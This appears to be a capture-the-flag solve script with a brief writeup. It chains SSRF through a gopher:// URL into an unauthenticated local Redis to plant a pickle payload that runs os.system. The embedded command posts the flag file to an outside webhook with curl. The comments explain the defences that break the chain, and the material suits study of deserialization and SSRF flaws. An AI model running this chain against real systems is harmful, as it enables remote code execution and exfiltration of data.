
Solve Script:
```python
import requests
import pickle
import base64

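def generate_payload(cmd):
    """Serialize an object whose unpickling calls ``os.system(cmd)``.

    The nested class overrides ``__reduce__``, the hook pickle consults to
    learn how an object is rebuilt. Returning ``(os.system, (cmd,))`` makes
    the stream record "call os.system with cmd", so the call happens inside
    ``pickle.loads`` in whichever process reads the bytes. Nothing runs here
    at dump time.

    This is why ``pickle.loads`` must not be fed data that another party can
    write (a shared cache, a queue, a cookie). Storing such data in a
    data-only format like JSON, or verifying an integrity tag over the blob
    before loading it, removes the primitive.

    Args:
        cmd: Shell command string embedded in the pickle stream.

    Returns:
        The pickled bytes produced by ``pickle.dumps``.
    """

    class PickleRce:
        def __reduce__(self):
            # Function-scope import, as in the original listing; pickle
            # stores os.system by module and name, not by value.
            import os

            return os.system, (cmd,)

    return pickle.dumps(PickleRce())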

# Challenge instance address, exactly as published in the writeup.
base = "http://161.35.168.118:32265"

# Step 1 - authenticate. The account uses the credentials admin/admin; the
# session cookies from this response are reused for the later request.
login_resp = requests.post(
    f"{base}/api/login",
    json={"username": "admin", "password": "admin"},
)
print(f"{login_resp.cookies}")

# Step 2 - build the value that ends up in Redis: a base64-encoded pickle
# produced by generate_payload() for the command below.
shell_cmd = "/readflag > /tmp/flag.txt; curl -d @/tmp/flag.txt https://webhook.site/e4e7d72a-5f56-4bee-89eb-f300c2147ae5"
picklePayload = base64.b64encode(generate_payload(shell_cmd))
print(f"{picklePayload=}")

# Step 3 - wrap two Redis commands in a gopher:// URL aimed at the server's
# own loopback Redis port (6379). HSET writes the blob into field 100 of the
# "jobs" hash and SAVE flushes the dataset to disk.
# Per the writeup's tl;dr the application later unpickles this entry; that
# code is not part of this listing.
# Defensive reading: the request only works if the URL fetcher accepts
# non-HTTP schemes and loopback targets, and if Redis takes commands without
# authentication. Restricting the fetcher to http/https on public addresses
# and requiring Redis auth each break the chain.
redis_cmds = f"HSET jobs 100 {picklePayload.decode()}\nSAVE"
ssrf = "gopher://127.0.0.1:6379/_" + requests.utils.quote(redis_cmds)

# print(f"{ssrf=}")
add_resp = requests.post(
    f"{base}/api/tracks/add",
    json={"trapName": "SJP", "trapURL": ssrf},
    cookies=login_resp.cookies,
)
print(add_resp.text)
```

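tl;dr: Use SSRF to inject a pickle RCE payload into Redis. The script logs in as `admin`/`admin`, then submits a `gopher://127.0.0.1:6379` URL as `trapURL` so that the server-side fetcher sends `HSET jobs 100 <base64 pickle>` to the local Redis. The command runs when the application later unpickles that job entry (the unpickling side is not shown in the script; see the video). The chain depends on three things: a fetcher that accepts non-HTTP schemes and loopback hosts, a Redis instance without authentication, and job data stored as pickle rather than a data-only format.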

Full writeup video:
[https://www.youtube.com/watch?v=hyUQ2_KLo84](https://www.youtube.com/watch?v=hyUQ2_KLo84)

Original writeup (https://www.youtube.com/watch?v=hyUQ2_KLo84).